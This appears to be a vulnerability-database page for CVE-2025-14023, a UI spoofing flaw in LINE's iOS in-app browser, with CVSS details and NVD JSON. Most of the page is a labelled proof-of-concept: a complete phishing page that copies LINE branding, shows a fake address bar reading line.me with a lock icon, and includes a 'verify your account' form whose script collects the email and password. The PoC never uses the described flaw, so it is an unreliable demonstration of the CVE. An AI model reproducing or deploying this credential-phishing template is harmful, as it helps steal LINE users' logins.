Security Vulnerability Report
CVE-2025-14023 CVSS 3.1 LOW

CVE-2025-14023

Published: 2025-12-15 07:15:51
Last Modified: 2026-01-07 16:15:49

Description

LINE client for iOS prior to 15.19 allows UI spoofing due to inconsistencies between the navigation state and the in-app browser's user interface, which could create confusion about the trust context of displayed pages or interactive elements under specific conditions.

CVSS Details

CVSS Score: 3.1
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:* - VULNERABLE
LINE client for iOS < 15.19

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-14023 UI Spoofing PoC for LINE iOS Client -->
<!-- This PoC demonstrates how an attacker can spoof LINE's trusted interface -->
<!DOCTYPE html>
<html>
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>LINE Security Alert</title>
  <style>
    /* Fake LINE header to mimic trusted interface */
    .fake-header { background-color: #00B900; color: white; padding: 15px; font-family: -apple-system, BlinkMacSystemFont, sans-serif; text-align: center; }
    /* Fake address bar overlay */
    .fake-address-bar { position: fixed; top: 0; left: 0; right: 0; height: 44px; background: rgba(255,255,255,0.97); display: flex; align-items: center; padding: 0 10px; border-bottom: 1px solid #ddd; z-index: 1000; }
    .fake-url { color: #333; font-size: 14px; margin-left: 10px; }
    /* Phishing form styled as LINE login */
    .phishing-container { margin-top: 60px; padding: 20px; }
    .phishing-form { background: white; border-radius: 10px; box-shadow: 0 2px 10px rgba(0,0,0,0.1); padding: 30px 20px; }
    .phishing-title { color: #00B900; font-size: 20px; font-weight: bold; margin-bottom: 20px; text-align: center; }
    .phishing-input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #ddd; border-radius: 5px; font-size: 16px; }
    .phishing-button { width: 100%; padding: 12px; background-color: #00B900; color: white; border: none; border-radius: 5px; font-size: 16px; margin-top: 15px; cursor: pointer; }
    .security-notice { background: #FFF3CD; border: 1px solid #FFECB5; padding: 15px; border-radius: 5px; margin: 15px 0; font-size: 14px; color: #856404; }
  </style>
</head>
<body>
  <!-- Fake address bar to hide real URL -->
  <div class='fake-address-bar'>
    <span style='font-size:12px;color:#888'>🔒</span>
    <span class='fake-url'>https://line.me/official/home</span>
  </div>
  <div class='phishing-container'>
    <div class='phishing-form'>
      <div class='phishing-title'>⚠️ Account Security Alert</div>
      <div class='security-notice'>
        Your account has been flagged for suspicious activity. Please verify your identity to continue using LINE services.
      </div>
      <form id='phishForm' onsubmit='stealCredentials(event)'>
        <input type='email' class='phishing-input' placeholder='Email or LINE ID' required>
        <input type='password' class='phishing-input' placeholder='Password' required>
        <button type='submit' class='phishing-button'>Verify Account</button>
      </form>
    </div>
  </div>
  <script>
    // Hide the real page content behind fake UI
    function hideRealAddressBar() {
      // Attempt to overlay fake address bar
      // In real attack, this would use various techniques
      console.log('UI Spoofing: Hiding real address bar');
    }

    function stealCredentials(event) {
      event.preventDefault();
      const formData = {
        email: event.target[0].value,
        password: event.target[1].value,
        timestamp: new Date().toISOString(),
        userAgent: navigator.userAgent
      };
      // In real attack, send to C2 server
      console.log('Stolen credentials:', formData);
      alert('Verification failed. Please try again.');
    }

    // Initialize spoofing
    hideRealAddressBar();
  </script>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14023", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:51.110", "lastModified": "2026-01-07T16:15:49.270", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "LINE client for iOS prior to 15.19 allows UI spoofing due to inconsistencies between the navigation state and the in-app browser's user interface, which could create confusion about the trust context of displayed pages or interactive elements under specific conditions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-Other"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:iphone_os:*:*", "versionEndExcluding": "15.19.0", "matchCriteriaId": "6330C6B7-81E1-45B5-9425-47F4252E136F"}]}]}], 
"references": [{"url": "https://hackerone.com/reports/3260386", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}, {"url": "https://hackerone.com/reports/3260386", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Permissions Required", "Third Party Advisory"]}]}}